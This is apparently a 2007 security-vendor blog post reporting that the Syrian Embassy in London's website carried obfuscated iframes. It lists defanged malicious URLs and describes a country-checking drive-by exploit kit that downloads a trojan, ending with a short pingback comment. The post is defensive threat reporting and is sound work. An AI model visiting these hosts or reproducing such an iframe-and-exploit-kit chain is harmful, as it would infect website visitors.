This is to confirm a report from Websense about the compromised official website of Syrian Embassy located in London. Indeed, there are three obfuscated iframes found in the site.
The following is a sample obfuscated script found in the compromised page:
Deobfuscating the said scripts we get the following URLs:
- hxxp://0ki.ru{blocked}/index.php
- hxxp://sicil.info{blocked}/index.php
- hxxp://x12345.or/{blocked}ounter.php?out=1189360677 (a zero-byte file)
Initial analysis of the first URL, it seems that it accepts country code as an argument, thus country checking is most probably employed. This is already detected as JS_PSYME.ANT. The second URL contains another iframe which leads to a URL containing the exploit kit (most probably Icepack). The exploit kit employs OS detection, web browser detection, and contains several exploits targeting web browsers and web browser plug-in. This will try to exploit several vulnerabilities to download and execute a file to be detected as TROJ_SMALL.KYZ. The exploit kit will be detected as JS_PSYME.ADQ.
The third URL just contains a zero-byte file.The malicious files are already being processed and the malicious URLs are submitted for blocking.
October 20th, 2007 at 11:58 am
[...] multe siteuri, unele chiar guvernamentale sau ale unor banci au fost "sparte". Resurse: Another Government Website Hacked - TrendLabs | Malware Blog - by Trend Micro Dancho Danchev - Mind Streams of Information Security Knowledge: Syrian Embassy in London Serving [...]